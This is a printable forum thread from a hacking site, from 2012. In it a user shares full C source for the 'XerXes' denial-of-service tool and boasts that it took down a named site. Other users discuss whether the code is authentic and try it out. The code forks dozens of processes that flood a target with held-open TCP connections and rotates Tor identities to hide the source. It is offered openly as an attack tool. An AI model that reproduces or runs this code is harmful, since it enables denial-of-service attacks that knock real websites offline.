Sinisterly
XerXes- th3j35t3r - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools)
+--- Thread: XerXes- th3j35t3r (/Thread-XerXes-th3j35t3r)

XerXes- th3j35t3r - AnonFreeworld - 12-19-2012

I share with you the source code of one of the most powerful DDoS tools out there. It has single handly tooken down many sites. Such as alemarah.info

Spoiler:
Code:
/* XerXes - Most powerful dos tool - THN (http://www.thehackernews.com) */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;
//    fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
        exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        fprintf(stderr, "No connection could be made\n");
        exit(0);
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
    return sock;
}

void broke(int s) {
    // do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
        sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x != CONNECTIONS; x++) {
            if(sockets[x] == 0)
                sockets[x] = make_socket(host, port);
            r=write(sockets[x], "\0", 1);
            if(r == -1) {
                close(sockets[x]);
                sockets[x] = make_socket(host, port);
            } else
//                fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
            fprintf(stderr, "[%i: Voly Sent]\n", id);
        }
        fprintf(stderr, "[%i: Voly Sent]\n", id);
        usleep(300000);
    }
}

void cycle_identity() {
    int r;
    int socket = make_socket("localhost", "9050");
    write(socket, "AUTHENTICATE \"\"\n", 16);
    while(1) {
        r=write(socket, "signal NEWNYM\n\x00", 16);
        fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
        usleep(300000);
    }
}

int main(int argc, char **argv) {
    int x;
    if(argc !=3)
        cycle_identity();
    for(x=0; x != THREADS; x++) {
        if(fork())
            attack(argv[1], argv[2], x);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}

RE: XerXes- th3j35t3r - Neo - 12-19-2012

Lots of people are saying that this is fake and not the real source of XerXes...

Do you think this is the right source?

RE: XerXes- th3j35t3r - Zealotry - 12-19-2012

(12-19-2012, 06:41 PM)Neo Wrote: Lots of people are saying that this is fake and not the real source of XerXes...

Do you think this is the right source?

I do.

Honestly, it works just like Slowloris with a GUI.

RE: XerXes- th3j35t3r - ICE_ - 12-19-2012

thanks for this Biggrin I'm going to test it out right now.
I couldn't seem to get it to work, It wouldn't knock anything down...

RE: XerXes- th3j35t3r - AnonFreeworld - 12-20-2012

(12-19-2012, 06:41 PM)Neo Wrote: Lots of people are saying that this is fake and not the real source of XerXes...

Do you think this is the right source?

It is it was confirmed and put out by THN or The Hacker News

RE: XerXes- th3j35t3r - Zealotry - 12-20-2012

(12-19-2012, 11:07 PM)Legion Wrote: thanks for this Biggrin I'm going to test it out right now.
I couldn't seem to get it to work, It wouldn't knock anything down...

It was based upon an Apache exploit that I believe has been patched.